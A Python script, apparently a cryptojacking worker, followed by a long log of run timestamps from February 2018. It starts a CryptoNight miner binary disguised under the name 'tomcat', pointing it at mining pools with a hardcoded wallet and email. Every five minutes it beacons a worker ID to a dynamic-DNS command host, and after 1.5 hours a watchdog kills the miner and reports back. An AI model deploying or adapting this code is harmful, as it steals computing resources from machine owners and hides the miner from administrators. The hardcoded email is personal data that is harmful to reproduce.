import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:27:04.147053
#2018-02-17 17:16:06.712258
#2018-02-17 19:04:06.429431
#2018-02-17 20:53:05.206862
#2018-02-17 22:40:02.379202
#2018-02-18 00:24:08.052109
#2018-02-18 02:15:07.470496
#2018-02-18 04:03:06.772128
#2018-02-18 05:52:05.569210
#2018-02-18 07:43:05.539700
#2018-02-18 09:31:03.467825
#2018-02-18 11:17:04.991577
#2018-02-18 13:03:07.743462
#2018-02-18 14:52:05.673920
#2018-02-18 16:41:07.016549
#2018-02-18 18:30:06.481489
#2018-02-18 20:18:06.841417
#2018-02-18 22:03:01.319864
#2018-02-18 23:52:04.344906
#2018-02-19 01:38:06.626983
#2018-02-19 03:26:03.741981
#2018-02-19 05:11:05.396993
#2018-02-19 06:57:07.059895
#2018-02-19 08:47:06.813723
#2018-02-19 10:36:01.349818
#2018-02-19 12:23:01.888207
#2018-02-19 14:10:05.926036
#2018-02-19 15:58:01.645557
#2018-02-19 17:46:08.296470
#2018-02-19 19:32:03.208773
#2018-02-19 21:19:07.293642
#2018-02-19 23:06:04.993401
#2018-02-20 00:52:04.072417
#2018-02-20 02:41:05.443495
#2018-02-20 04:30:07.001450
#2018-02-20 06:14:04.769884
#2018-02-20 07:59:07.443992
#2018-02-20 09:45:06.937058
#2018-02-20 11:29:01.624175
#2018-02-20 13:15:06.335950
#2018-02-20 15:01:05.915927
#2018-02-20 16:47:09.269462
#2018-02-20 18:35:10.998309
#2018-02-20 20:26:07.118243
#2018-02-20 22:11:03.814571
#2018-02-20 23:53:05.604044
#2018-02-21 01:37:05.808112
#2018-02-21 03:25:04.396135
#2018-02-21 05:12:07.425529
#2018-02-21 06:59:05.732293
#2018-02-21 08:45:08.447663
#2018-02-21 10:31:01.915881
#2018-02-21 12:19:05.215951
#2018-02-21 14:06:01.310204
#2018-02-21 15:51:07.416852
#2018-02-21 17:42:05.635384
#2018-02-21 19:29:07.863749
#2018-02-21 21:17:06.211382
#2018-02-21 23:05:08.390084
#2018-02-22 00:54:05.712838
#2018-02-22 02:41:08.310063
#2018-02-22 04:27:07.265128
#2018-02-22 06:13:08.166171
#2018-02-22 07:57:06.766077
#2018-02-22 09:47:04.920515
#2018-02-22 11:32:06.179526
#2018-02-22 13:19:07.816901
#2018-02-22 15:08:08.128949
#2018-02-22 16:51:08.245684
#2018-02-22 18:39:01.251730
#2018-02-22 20:32:02.168385
#2018-02-22 22:17:02.104538
#2018-02-23 00:03:08.770085
#2018-02-23 01:50:07.325830
#2018-02-23 03:39:01.757062
#2018-02-23 05:24:05.769675
#2018-02-23 07:10:01.535685
#2018-02-23 09:14:04.637745
#2018-02-23 11:21:12.014259
#2018-02-23 13:12:01.526441
#2018-02-23 14:56:05.564261
#2018-02-23 16:46:09.105489
#2018-02-23 18:40:09.129643
#2018-02-23 20:27:01.758423
#2018-02-23 22:14:05.394025
#2018-02-24 00:00:10.984730
#2018-02-24 01:49:06.468092
#2018-02-24 03:41:04.430615
#2018-02-24 05:26:02.151865
#2018-02-24 07:13:05.276261
#2018-02-24 09:03:02.088112
#2018-02-24 10:59:06.962366
#2018-02-24 12:48:03.411237
#2018-02-24 14:37:03.134701
#2018-02-24 16:24:03.254921
#2018-02-24 18:17:07.513657
#2018-02-24 20:04:06.899725
#2018-02-24 21:46:07.060991
#2018-02-25 00:45:01.480602
#2018-02-25 04:37:04.821049
#2018-02-25 08:02:07.430323